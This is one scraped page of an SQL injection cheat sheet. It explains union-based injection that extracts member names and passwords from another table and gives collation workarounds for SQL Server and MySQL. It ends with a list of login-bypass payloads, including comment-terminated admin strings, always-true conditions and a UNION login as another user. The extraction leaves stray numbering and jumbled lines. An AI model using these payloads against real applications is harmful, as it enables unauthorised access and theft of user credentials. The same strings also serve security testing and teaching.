Sql Injection Cheat Sheet Page 6
ADVERTISEMENT
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18Union Injections
With union you do SQL queries cross-table. Basically you can poison query to return
records from another table.
SELECT header, txt FROM news UNION ALL SELECT name, pass FROM members
This will combine results from both news table and members table and return all of
them.
Another Example :
' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--
UNION – Fixing Language Issues
While exploiting Union injections sometimes you get errors because of different
language settings (table settings, field settings, combined table / db settings etc.) these
functions are quite useful to fix this problem. It's rare but if you dealing with Japanese,
Russian, Turkish etc. applications then you will see it.
•
SQL Server (S)
Use
or some other valid
field COLLATE SQL_Latin1_General_Cp1254_CS_AS
one - check out SQL Server documentation.
SELECT header FROM news UNION ALL SELECT name COLLATE
SQL_Latin1_General_Cp1254_CS_AS FROM members
•
MySQL (M)
for every possible issue
Hex()
Bypassing Login Screens (SMO+)
SQL Injection 101, Login tricks
•
admin' --
•
admin' #
•
admin'/*
•
' or 1=1--
•
' or 1=1#
•
' or 1=1/*
•
') or '1'='1--
•
') or ('1'='1--
•
....
•
Login as different user (SM*)
' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--
*Old versions of MySQL doesn't support union queries
Bypassing second MD5 hash check login screens
ADVERTISEMENT
0 votes
Related Articles
Related forms
Related Categories
Parent category: Education